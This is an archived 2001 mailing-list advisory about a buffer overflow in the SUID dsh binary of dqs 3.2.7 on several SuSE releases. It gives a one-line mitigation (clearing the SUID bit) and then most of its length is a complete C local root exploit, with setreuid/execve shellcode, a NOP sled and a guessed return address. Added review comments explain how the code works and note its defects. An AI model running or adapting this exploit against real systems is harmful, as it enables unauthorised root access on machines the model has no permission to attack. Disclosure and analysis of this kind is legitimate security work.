dqs 3.2.7 local root exploit.

From: dex dex (dexgodat_private)
Date: Fri May 18 2001 - 17:09:11 PDT


    Subject: dqs 3.2.7 local root exploit.
    
    Hello.
    
    DESCRIPTION:
    I found a buffer overflow vulnerability in
    /usr/bin/dsh (dqs 3.2.7
    package).
    
    I really don't know whether this bug has already been
    discovered. If it has,
    then sorry =).
    
    If a long string is given as the first argument, the
    program dies with a SIGSEGV
    signal.
    
    This bug was reported to Drake Diedrich, maintainer
    of dqs
    (Drake.Diedrichat_private).
    
    AFFECTED:
    SuSE 6.3, 6.4 and 7.0 ship dqs 3.2.7 by default
    and are therefore vulnerable;
    maybe others are too.
    
    FIX:
    Remove the SUID permission
    |root@netdex /root|# ls -la /usr/bin/dsh
    -rwsr-xr-x    1 root     root       502748 May 18
    00:36 /usr/bin/dsh
    |root@netdex /root|# chmod -s /usr/bin/dsh
    |root@netdex /root|# ls -la /usr/bin/dsh
    -rwxr-xr-x    1 root     root       502748 May 18
    00:36 /usr/bin/dsh
    |root@netdex /root|#
    
    EXAMPLE EXPLOIT: 
    You can find the exploit at
    www.raza-mexicana.org/programas/programas/qsexp.c
    And here it is:
    
    ----CUT HERE----
    
    /* - dqsexp.c - */
    /********************************************************************/
    /* /usr/bin/dsh(dqs 3.2.7 package) local root exploit.              */
    /* SuSE 6.3, 6.4, and 7.0 are vulnerable.                            */
    /* dex@raza-mexicana.org <>
    http://www.raza-mexicana.org            */
    /* Saludos: dr_fdisk^, yield, vlad, deadsector,
    trovalz, fatal,     */
    /* megaflop y a todo raza. que weba escribirlos
    todos XD.           */
    /* En especial saludos al espa~olete(NOP) :P, ya
    sabes porque.      */
    /*                                                                 
    */
    /*        - dex@raza-mexicana.org <>
    http://www.raza-mexicana.org - */
    /********************************************************************/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    #define BUFFSIZE 2772
    #define OFFSET 0
    #define ALIGN 0
    
    /* Returns (approximately) the caller's stack pointer. The inline asm
     * copies %esp into %eax and the function then relies on %eax being the
     * i386 return register; there is no return statement, so this is
     * undefined behaviour in standard C and only "works" on 32-bit x86 with
     * a compiler that does not touch %eax before the function returns. */
    unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
    }
    
    /* Payload placed inside the oversized argument. According to the
     * author's comment it was lifted from an older mount exploit. It makes
     * two int 0x80 system calls: the first with %eax=70 and %ebx=%ecx=0,
     * the second with %eax=0x0b and %ebx pointing at the trailing
     * "/bin/sh" bytes -- the Linux/i386 setreuid(0,0) and execve() syscall
     * numbers. The jmp/call pair is the usual way of loading the address of
     * the string into %esi without knowing where the code was placed. */
    static char code[]=                      /* stolen from mount.c :P   */
    
      "\x29\xc0"                             /* subl %eax, %eax          */
      "\xb0\x46"                             /* movb $70, %al            */
      "\x29\xdb"                             /* subl %ebx, %ebx          */
      "\xb3\x0c"                             /* movb $12, %bl            */
      "\x80\xeb\x0c"                         /* subb $12, %bl            */
      "\x89\xd9"                             /* movl %ebx, %ecx          */
      "\xcd\x80"                             /* int $0x80                */
      "\xeb\x18"                             /* jmp callz                */
      "\x5e"                                 /* popl %esi                */
      "\x29\xc0"                             /* subl %eax, %eax          */
      "\x88\x46\x07"                         /* movb %al, 0x07(%esi)     */
      "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)    */
      "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)    */
      "\xb0\x0b"                             /* movb $0x0b, %al          */
      "\x87\xf3"                             /* xchgl %esi, %ebx         */
      "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx    */
      "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx    */
      "\xcd\x80"                             /* int $0x80                */
      "\xe8\xe3\xff\xff\xff"                 /* call start               */
      "\x2f\x62\x69\x6e\x2f\x73\x68";        /* "/bin/sh"                */
    
    
    /* Builds an oversized first argument for /usr/bin/dsh and exec's it.
     * argv[1..3] optionally override the return-address offset, the
     * payload alignment and the argument length (defaults OFFSET, ALIGN,
     * BUFFSIZE). The argument is filled with 0x90 (NOP) bytes, its last
     * two 4-byte words are overwritten with the guessed stack address and
     * the payload is copied just in front of them.
     *
     * NOTE(review): `void main` is not standard C, malloc() is unchecked,
     * the `*(long *)&buffer[i]` stores assume a 32-bit long (and are an
     * aliasing/alignment violation on stricter compilers), and `%x` is
     * given an unsigned long. Several string literals below are also split
     * across lines by mail wrapping and will not compile as pasted.
     * The advisory's mitigation is to clear the SUID bit on the target. */
    void main(int argc, char **argv) {
    
    int i;
    unsigned long addr;
    
    char *buffer;
    
    int offset=OFFSET;
    int buffsize=BUFFSIZE;
    int align=ALIGN;
    
    /* Optional overrides; atoi() gives 0 on garbage input. */
    if (argc > 1 ) offset = atoi(argv[1]);
    if (argc > 2 ) align = atoi(argv[2]);
    if (argc > 3 ) buffsize = atoi(argv[3]);
    
    /* +8 leaves room past the two address words; result is not checked. */
    buffer = (char *)malloc(buffsize + 8);
    
    /* Guess for where the argument will end up on the target's stack. */
    addr = get_sp() - offset;
     
    /* NOP sled: one 4-byte store per iteration, so buffsize is assumed to
     * be a multiple of 4. */
    for(i = 0; i < buffsize; i += 4) {
       *(long *)&buffer[i] = 0x90909090;
     }
     
    /* Last two words carry the guessed address. */
     *(long *)&buffer[buffsize - 8] = addr;
     *(long *)&buffer[buffsize - 4] = addr;
     
    /* Payload sits immediately before the address words, shifted back by
     * `align` bytes. Note the buffer is never NUL-terminated here; the
     * final 0x90 bytes are simply followed by whatever malloc() returned. */
     memcpy(buffer + buffsize - 8 - strlen(code) -
    align, code, strlen(code));
     
    
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
     printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local
    root exploit.\n");
     printf("[*] - dex@raza-mexicana.org <>
    http://www.raza-mexicana.org -
    \n");
    
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
     
     printf("[*] Address=0x%x, Align=%d, Offset=%d\n",
    addr, align, offset);
    
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
     printf("[*] Starting....\n");
     
    /* Replaces this process with the SUID target; the crafted buffer is
     * argv[1]. execl() only returns on failure, which is not reported. */
     execl("/usr/bin/dsh", "dsh", buffer,
    "/etc/motd",  NULL);
    }
    
    ----EOF----
    
    =================================================
    Mail: dex@raza-mexicana.org
    Page: http://www.raza-mexicana.org
    ===============================================
    


